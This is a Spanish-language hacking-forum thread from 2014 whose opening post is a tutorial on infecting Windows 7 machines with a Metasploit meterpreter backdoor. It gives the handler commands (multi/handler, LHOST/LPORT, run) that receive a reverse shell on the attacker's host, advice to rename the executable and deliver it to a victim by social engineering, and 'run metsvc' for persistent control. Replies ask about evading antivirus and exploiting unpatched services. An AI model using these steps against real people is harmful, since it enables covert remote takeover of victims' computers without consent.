Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: arm972 en Mayo 01, 2014, 12:10:08 PM

Título: Explotando windows 7 sp1 con metasploit
Publicado por: arm972 en Mayo 01, 2014, 12:10:08 PM
Hola a todos ,aquí les traigo un tutorial de como infectar windows 7 sp1 por medio de la generación de un payload por el modulo msfpayload de metasploit ,generaremos este payload para poder que la victima reciba el archivo lo ejecute y asi poder obtener una shell meterpreter  8)  y tener control total sobre esta maquina .

aquí van los pasos a seguir :

1.Generamos el payload con el modulo msfpayload de metasploit ,este payload seria la backdoor para tener control sobre la victima una vez haya recibido nuestra backdoor ,para esto ingresamos a nuestra terminal y escribimos :

Link de la imagen de el procedimiento:

(https://onedrive.live.com/redir?resid=398C61F2768A9EE!202&authkey=!AKWHp_ojvWL7zR0&v=3&ithint=photo%2c.png)

donde:

LHOST=tu ip local.
LPORT=puerto de escucha del payload "backdoor" pueden usar cualquier puerto a su gusto.
x >/root/backdoor.exe  este parámetro es para especificar donde vamos a generar el archivo de nuestro payload "backdoor".

2.Ingresamos a nuestra consola de metasploit para ya entrar en efectividad del payload generado por medio de un exploit para esto hacemos lo siguiente:

donde vamos a decirle a metasploit que vamos a usar cierto exploit y sus respectivos parámetros .

vamos a usar un exploit multi-cabecera.

link de la imagen del procedimiento:

(https://onedrive.live.com/redir?resid=398C61F2768A9EE!200&authkey=!AL-u0mw2nYJGyxE&v=3&ithint=photo%2c.png)

use exploit/multi/handler ="aqui estamos diciendo a metasploit que vamos a usar este exploit"

set payload windows/meterpreter="aquí estamos defiendo el payload para nuestro exploit "backdoor".

set lhost=tu dirección ip local

set lport=puerto de escucha.

run para dar como tal ya ejecución a nuestro exploit:

ya como tal se van a la carpeta en este caso root donde van a poder encontrar el archivo backdoor.exe , para no levantar muchas sospechas lo nombramos de otra manera por logica ,bueno ya si todo va bien ,tendremos que por medio de nuestras técnicas de ingeniera social hacer llegar nuestro backdoor a la victima  y poder tener acceso a nuestra sesión de meterpreter.

3.procedemos a ejecutar un servicio de acceso y control  para inyectárselo a nuestra victima para así tenerla controlada de forma remota ,hacemos lo siguiente:

meterpreter > run metsvc
Título: Re: Explotando windows 7 sp1 con metasploit
Publicado por: t0n4 en Mayo 05, 2014, 05:03:09 PM
Buena tecnica, pero no siempre tenemos suerte con la ingenieria social, algunas veces he probado esa tecnica, y tengo que comprimir la backdoor.exe porque algunos antivurus la detectan y la eliminan.Tengo dos preguntas.

1 Hay alguna forma de que la backdoor no sea detectada por antivirus??
2 Existe alguna forma de obtener una session meterpreter a  windows 7 con alguna tecnica que no sea por ingenieria social??
Gracias de antemano..
   Salu2: shirylmfao
Título: Re: Explotando windows 7 sp1 con metasploit
Publicado por: Cl0udswX en Mayo 13, 2014, 09:19:50 PM
Buenas tardes hermano.

1ero. Tienes una forma de redactar un poco confusa y desordenada, lo cual dificulta su correcta comprensión. (Podrías editarlo para que quede de forma mas clara y comprensible)

2do. Las imágenes están caídas. (Podrías intentar subirlas nuevamente)

3ero. A grandes rasgos eso que describes es muy similar a compilar algún troyano para luego enviarlo tirando de la ingeniería social.




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

1 Hay alguna forma de que la backdoor no sea detectada por antivirus??

Que hable la sabiduría.. (https://www.google.com.do/search?q=indetectable+.exe&oq=indetectable+.exe&aqs=chrome..69i57j0l5.9112j0j4&sourceid=chrome&es_sm=93&ie=UTF-8)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2 Existe alguna forma de obtener una session meterpreter a  windows 7 con alguna tecnica que no sea por ingenieria social??
Gracias de antemano..
   Salu2: shirylmfao

Es el clásico método de recopilar información (servicios, aplicaciones y sus versiones, puertos abiertos, tipo de conexión, etc..) y luego vulnerarlas con algún exploit que no haya sido parcheado aun.

P.D La ingeniería social funciona, simplemente es cuestión de ser audaz.

Saludos por allá hermanos.